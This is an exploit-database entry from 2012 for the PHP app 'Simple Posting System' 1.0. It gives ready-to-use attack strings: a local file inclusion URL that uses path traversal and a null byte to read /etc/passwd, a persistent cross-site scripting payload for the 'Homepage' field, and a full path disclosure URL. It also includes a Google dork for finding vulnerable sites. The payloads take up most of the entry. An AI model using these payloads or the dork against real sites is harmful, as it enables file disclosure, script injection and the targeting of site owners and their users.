[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Simple Posting System Multiple Vulnerabilities
# Published : 2012-03-14
# Author :
# Previous Title : Cisco Linksys WAG54GS CSRF Change Admin Password
# Next Title : Zend Server 5.6.0 Multiple Remote Script Insertion Vulnerabilities


# Exploit Title: Simple Posting System [Multple]
# Google Dork: inurl:sps.php?old= or inurl:sps.php "
# Date: 14/03/2012
# Author: n0tch aka andmuchmore
# Software Link: http://realize.be/files/sps.tar.gz
# Version: 1.0 Final
# Tested on:  Windows 7 / Linux(Ubuntu)


+[-- LFI --]+

http://localhost/sps.php?old=../../../../../../../../../../../../../../../../../etc/passwd%00

+[-- Persistent XSS --]+

Vulnerable Field = "Homepage"
Payload syntax: ><script>alert('XSS');</script>

+[-- FPD --]+

http://localhost/sps/sps_admin/comment.php?op=del&id=3&aantal=4

+[-- Shoutz --]+

All the belegit crew..